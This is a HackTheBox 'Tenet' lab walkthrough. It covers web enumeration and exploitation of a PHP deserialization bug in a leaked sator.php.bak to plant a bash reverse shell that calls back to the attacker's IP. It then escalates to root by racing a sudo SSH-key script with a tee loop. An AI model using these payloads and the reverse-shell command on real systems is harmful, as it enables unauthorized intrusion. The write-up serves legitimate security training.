HacktheBox - Tenet -Retired

Recon

As is my custom I start with a threader3000 scan of the ip.

Port 22 is open Port 80 is open Port scan completed in 0:00:19.560415

Just two ports 22 and 80

We will let threader run the suggested nmap scan.

Threader3000 recommends the following Nmap scan: ************************************************************ nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.10.223 10.10.10.223 ************************************************************

PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA) |   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA) |_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519) 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Standard open SSH for HTB… Open ssh 7.6p1

And Apache 2.4.29 on port 80, let's check it out.

Default apache page.

Let's see if we can find anything else being served on port 80

dirb http://10.10.10.223

Pretty quickly we get back some hits

Wordpress is installed here, let's check it out.

If we add tenet.htb to our /etc/hosts file we now get this.

And it's powered by WordPress

Let's fire off wpscan and see if we can find a path forward.

Let's throw rockyou.txt at any discovered users too, see if we can get some easy wins..

wpscan --url http://tenet.htb/ -e u --passwords /usr/share/wordlists/rockyou.txt

Pretty quickly we get some good info

XMLRPC seems to be enabled.

There is an upload folder

Wordpress version is 5.6

Two users were identified protagonist, and neil

A login portal

A comment from the user neil

What is sator?

Let's see if its a vhosts here and add it to our /etc/hosts

Now we get a default apaches page when we browse to http://sator.tenet.htb

Let's see if we can find the php file mentioned here sator.php

http://sator.tenet.htb/sator.php

interesting

Let's set drib at this new vhost.

Another wordpress, let's check this one out.

Remember this in the comment?

And the backup?   I wonder if it's still live on sator.tenet.htb…   sator.php.bak perhaps?

Looks like it is 

<?php class DatabaseExport { public $user_file = 'users.txt'; public $data = ''; public function update_db() { echo '[+] Grabbing users from text file <br>'; $this-> data = 'Success'; } public function __destruct() { file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data); echo '[] Database updated <br>'; // echo 'Gotta get this working properly...'; } } $input = $_GET['arepo'] ?? ''; $databaseupdate = unserialize($input); $app = new DatabaseExport; $app -> update_db(); ?>

Ok let's look at this code.

1. It looks like the code is looking for a GET variable called "arepo" and that data in there is being deserialized into the $databaseupdate variable.

2. There is a function named __destruct() which looks like it will write the contents of "arepo" to the root of the directory.

But destruct isn't called in the php code…. Or is it?

Do you know about PHP "Magic Methods"?

https://www.php.net/manual/en/language.oop5.magic.php

Basically in PHP if you write a method that has a specific name…. It will always be called even if you don't explicitly call it in your code

So the __destruct function will run every time…..

So we can use the __destruct function to write our own file to the server. We just need to send it some serialized data in a manner that it will deserialize correctly.

Exploit

So let's create php function on our machine that we can use to serialize what we want to send, and then fire that over to sator.php.

Let's grab our favorite little tiny php reverse shell 

https://gist.github.com/rshipp/eee36684db07d234c1cc

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");?>

And modify it to be our VPN ip

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1'");?>

Now we will build out our code

class DatabaseExport {     public $user_file = 'circusmonkey.php';     public $data = '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1\'"); ?>'; } print(serialize(new DatabaseExport));

Make sure you escape the interior single quotes so the output gets written correctly

Let's run php interactively so we can grab the output.

php -a

Paste in our php code

Here is my output from php 

O:14:"DatabaseExport":2:{s:9:"user_file";s:16:"circusmonkey.php";s:4:"data";s:74:"<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1'"); ?>";}

Now I'm going to use burp to capture the request, send it over to repeater and insert our variable.

This is the original GET request.

Over in repeater I'll just add the serialized output as a variable named arepo and send it over to the machine.

We got back a 200 from the server, so it looks like we were able to place the file.

Let's start our netcat listener to hopefully catch our shell.

nc -lnvp 5555

Then we just need to browse to the circusmonkey.php file and hopefully we got a shell.

And we do have a shell, let's figure out next steps now.

I think we found our path in the first three commands I check to start out.

Www-data can run /usr/local/bin/enableSSH.sh as root with no password.

cat /usr/local/bin/enableSSH.sh #!/bin/bash checkAdded() {     sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)     if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then             /bin/echo "Successfully added $sshName to authorized_keys file!"     else             /bin/echo "Error in adding $sshName to authorized_keys file!"     fi } checkFile() {     if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then             /bin/echo "Error in creating key file!"             if [[ -f $1 ]]; then /bin/rm $1; fi             exit 1     fi } addKey() {     tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)     (umask 110; touch $tmpName)     /bin/echo $key >>$tmpName     checkFile $tmpName     /bin/cat $tmpName >>/root/.ssh/authorized_keys     /bin/rm $tmpName } key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu" addKey checkAdded

We don't have write access to the script

But what is the script doing?

Well this bit is using mktemp to create a new file in /tmp with the name of ssh dash random which is what the mktemp command does just gives you random file or folder names

https://www.cyberciti.biz/tips/shell-scripting-bash-how-to-create-temporary-random-file-name.html

Then changing the permissions on the file to be rw-rw-rw-

https://www.linuxtrainingacademy.com/all-umasks/

Then it echos the key variable from the bottom of the script into a file, then runs through a check of some sort and if it passes it copies the key into /root/.ssh/authrorized_keys

So if we can sneak our key into this process somehow we can hopefully have it added to the authrozied_keys for the root user :)

We just need to find a way to look for files named ssh-* in /tmp and if found continually write our public key to it, hopefully we can catch it after it writes the hard coded key to the file but before it writes it to authorized_keys

Then run the enableSSH.sh script as root with our sudo privileges.

Ok first things first.

Let's generate a new set of keys that we can use

ssh-keygen -t rsa

I told it to save mine in my HTB folder for tenet. I used touch to create the file before hand :)

And we look at our key

Ok that step is out of the way

How can we monitor the folder /tmp for new files names ssh-*

We can use tee to write out the results of a command to a file and we  can use wildcards with tee.

So we could echo our public key pipe it to see to write to any file named ssh-* using tee.

And if we stick that all in a loop hopefully we can just keep that running while we run the enabeSSH.sh script as root and get our public key copied into /root/.ssh/authroized_keys

We can use a bash infinite loop to just repeat the command like crazy :)

https://www.cyberciti.biz/faq/bash-infinite-loop/

So put together our command would looks something like

while true; do echo "ssh-rsa AAAAB3NzaC1yc******************************************************************************************************************************************************************************************************************************************* kali@kali" | tee /tmp/ssh* >/dev/null;done

Then we can though a & on the end of the command so it will run in the background and call the enableSSH.sh script as root using sudo

Since this is blind and we don't know if it works when we run it, I ran it a bunch of times to up our chances of our key actually making it to authorized_users

Now we can try to connect up as root using SSH

Forgot to change the permissions on the id_rsa private key we created.  Fixed it with

chmod 600 ./id_rsa

But after that……

We are root!!